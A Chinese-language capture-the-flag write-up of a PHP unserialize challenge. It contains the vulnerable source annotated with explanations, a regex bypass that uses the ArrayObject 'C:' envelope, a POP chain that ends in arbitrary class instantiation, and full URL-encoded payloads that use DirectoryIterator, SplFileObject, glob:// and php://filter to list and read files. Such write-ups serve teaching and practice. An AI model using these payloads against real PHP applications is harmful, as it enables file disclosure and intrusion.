preg_match("/^[Oa]:[\d]+/i";
正则绕过：最开始尝试在 O: 后加 + 号绕过，但绕不过去，于是改用 C: 格式的序列化串（ArrayObject 外层）：
$a = new ArrayObject;
$a->a = new Me;
首先要读出key.php内容,
/key.php?a=PHP_SELF&user=C%3A8%3A%22SplStack%22%3A211%3A%7Bi%3A6%3B%3AO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3BN%3Bs%3A2%3A%22QW%22%3Bs%3A64%3A%22M%C9h%FF%0E%E3%5C+%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2%22%3Bs%3A3%3A%22YXX%22%3Bs%3A64%3A%22M%C9h%FF%0E%E3%5C+%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2%22%3B%7D%7D
key.php 读出来后要查看源文件才能显示；内容是 base64 编码的图片，在线转成图片后得到 hername 和 key 的值，后面第二步要用到。
找POP链进入利用点: new $_POST['ctf']($_GET['fun']);
然后就是利用原生类进行找flag文件和读flag文件
<?php
// Every response is served as UTF-8 HTML (the echoed strings in this file are Chinese).
header('Content-type:text/html;charset=utf-8');
// All diagnostics are suppressed, so warnings from unserialize() / file_get_contents()
// never reach the client and never show up in the page output.
error_reporting(0);
#show_source(__FILE__);
// key.php presumably defines encode() and the values her::find() compares against
// (neither file is shown here); waf.php is included but its contents are unknown.
include 'key.php';
include 'waf.php';
/**
 * First link of the chain: unserialize() runs __wakeup() on every Me instance
 * found in a payload. The freshly rolled $secret can only be matched when $bro
 * is a PHP reference to $secret (the R: reference entry in the serialized payloads).
 */
class Me
{
    public $qwe;
    public $bro;
    public $secret;

    /**
     * Re-rolls $secret, then calls $qwe as a callable when $bro equals it.
     *
     * @return mixed whatever $qwe() returns, or null when the comparison fails
     */
    public function __wakeup()
    {
        echo("进来啦<br>");
        $alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789';
        // str_shuffle() is not cryptographically secure; the value only acts as a
        // per-request guess barrier, and a reference to it defeats it entirely.
        $this->secret = substr(str_shuffle($alphabet), 0, 6);
        if ($this->bro !== $this->secret) {
            echo("错了哥们,再试试吧<br>");
            return;
        }
        // $qwe is attacker-controlled after unserialize(); any callable (including
        // an object with __invoke) is called here.
        $callable = $this->qwe;
        return $callable();
    }
}
/**
 * Reached from Me::__wakeup() (as $qwe) and again from useless::__get().
 * __invoke() serialises $asd, so any __sleep() on that object runs; find() is
 * the sink: once encode() accepts the stored name/key and the named file reads
 * as "loveyou", it instantiates a class chosen entirely by the request.
 *
 * Property declaration order (hername, key, asd) fixes the serialized layout,
 * so it must not be changed.
 */
class her
{
    private $hername = 'momo';
    private $key = 9;
    public $asd;

    /** Runs when a her instance is called like a function. */
    public function __invoke()
    {
        echo("好累,好想睡一觉啊<br>");
        // The result is discarded; only the side effects of serialising $asd matter.
        serialize($this->asd);
    }

    /**
     * Gate plus sink. encode() comes from key.php and is not visible in this file.
     * Echoes one progress message per stage so the caller can tell where it stopped.
     */
    public function find()
    {
        echo("你能找到加密用的key和她的名字吗?qwq<br>");
        if (encode($this->hername, $this->key) !== 'vxvx') {
            echo("兄弟怎么搞的?<br>");
            return;
        }
        echo("解密成功!<br>");
        $file = $_GET['file'];
        // Second argument of file_get_contents() is use_include_path; 'r' is merely
        // truthy here. The path is request-controlled, so any stream wrapper works.
        $contentMatches = isset($file) && (file_get_contents($file, 'r') === "loveyou");
        if (!$contentMatches) {
            echo("真的只差一步了!<br>");
            return;
        }
        echo("快点的,急急急!!!<br>");
        // Unrestricted instantiation: class name and constructor argument both come
        // from the request, and the object's string form is echoed back.
        echo new $_POST['ctf']($_GET['fun']);
    }
}
/**
 * Carrier object: only the public $power is serialised. The __sleep() below is
 * commented out in this listing; with it active, serialize() would read
 * $power->seeyou, and because useless::$seeyou is private that access goes
 * through useless::__get('seeyou').
 */
class important
{
    public $power;

    /* public function __sleep() {
    echo("睡饱了,接着找!<br>");
    return $this->power->seeyou;
    } */
}
/**
 * Holds the callable that the chain finally runs. $seeyou maps the name
 * 'seeyou' to [her, 'find'], and __get() invokes whichever element shares the
 * name of the property that was requested.
 */
class useless
{
    private $seeyou;
    public $QW;
    public $YXX;

    public function __construct()
    {
        $this->QW = new her;
        // A callable array: ['seeyou' => [object, method]] is what __get() calls.
        $this->seeyou = ['seeyou' => [$this->QW, 'find']];
    }

    /*
     * Disabled in this listing. Note that $random is six digits, so the
     * `$random === 'newbee'` condition could never hold and the key.php
     * read below it would be unreachable even if the method were enabled.
     */
    /* public function __destruct() {
    $characters = '0123456789';
    $random = substr(str_shuffle($characters), 0, 6);
    if (!preg_match('/key\.php\/*$/i', $_SERVER['REQUEST_URI'])){
    if((strlen($this->QW))<80 && strlen($this->YXX)<80){
    $bool=!is_array($this->QW)&&!is_array($this->YXX)&&(md5($this->QW) === md5($this->YXX)) && ($this->QW != $this->YXX) and $random==='newbee';
    if($bool){
    echo("快拿到我的小秘密了<br>");
    $a = isset($_GET['a'])? $_GET['a']: "" ;
    if(!preg_match('/HTTP/i', $a)){
    echo (basename($_SERVER[$a]));
    echo ('<br>');
    if(basename($_SERVER[$a])==='key.php'){
    echo("找到了!但好像不能直接使用,怎么办,我好想她<br>");
    $file = "key.php";
    readfile($file);
    }
    }
    else{
    echo("你别这样,她会生气的┭┮﹏┭┮");
    }
    }
    }
    else{
    echo("就这点能耐?怎么帮我找到她(╥╯^╰╥)<br>");
    }
    }
    } */

    /**
     * Magic getter for inaccessible properties: reads the property named $good
     * and calls the element of that same name as a callable. Nothing is returned.
     *
     * @param string $good name of the property being read
     */
    public function __get($good)
    {
        echo "you are good,你快找到我爱的那个她了<br>";
        $holder = $this->{$good};
        ($holder[$good])();
    }
}
// Entry point of the chain. The only control is a prefix regex that rejects
// payloads starting with "O:" (object) or "a:" (array); every other serialized
// envelope — the "C:" form used by the payloads on this page, for instance — is
// handed to unserialize() unchanged. A prefix check is not a meaningful defence
// for serialized data; the fix is to not unserialize() request input at all, or
// at minimum to call it with ['allowed_classes' => false].
if (!isset($_GET['user'])) {
    echo("快帮我找找她!<br>");
} else {
    $user = $_GET['user'];
    if (preg_match("/^[Oa]:[\d]+/i", $user)) {
        echo("不是吧,第一层都绕不过去???<br>");
    } else {
        unserialize($user);
    }
}
// Payload generator for the writeup (not part of the challenge logic). The Me
// object is wrapped in an ArrayObject because that envelope is not matched by
// the O:/a: prefix regex; unserialize() still reconstructs the Me inside it and
// fires its __wakeup(). The serialized form shown on this page is the "C:" one;
// newer PHP releases emit a different envelope for ArrayObject, so re-check the
// output on the interpreter actually used.
$me = new Me;
// $bro must alias $secret so the fresh random value in __wakeup() still compares equal.
$me->bro = &$me->secret;
$me->qwe = new her;
$me->qwe->asd = new important;
$me->qwe->asd->power = new useless;
$me->qwe->asd->power->QW = new her;

$a = new ArrayObject;
$a->a = $me;
echo serialize($a);
echo '<br><br>';
echo urlencode(serialize($a));
?>
POST: ctf=DirectoryIterator，GET: fun=glob://f* 时可列出 flag 文件名: flag_my_baby.php
GET:?user=C%3A11%3A%22ArrayObject%22%3A446%3A%7Bx%3Ai%3A0%3Ba%3A0%3A%7B%7D%3Bm%3Aa%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7Ds%3A2%3A%22QW%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BN%3B%7Ds%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A23%3B%7D%7D%7D&file=data://text/plain,loveyou&fun=glob://f*
POST:ctf=DirectoryIterator
POST: ctf=SplFileObject；GET: fun=php://filter/read=convert.base64-encode/resource=flag_my_baby.php
这里要用 php://filter 伪协议才能读出全部文件内容，否则只传文件名时 SplFileObject 只会输出一行。
/havefun.php?user=C%3A11%3A%22ArrayObject%22%3A446%3A%7Bx%3Ai%3A0%3Ba%3A0%3A%7B%7D%3Bm%3Aa%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7Ds%3A2%3A%22QW%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BN%3B%7Ds%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A23%3B%7D%7D%7D&file=data://text/plain,loveyou&fun=php://filter/read=convert.base64-encode/resource=flag_my_baby.php
POST:ctf=SplFileObject
最终得到flag
最后发现直接访问 flag_my_baby.php 就可以出 flag。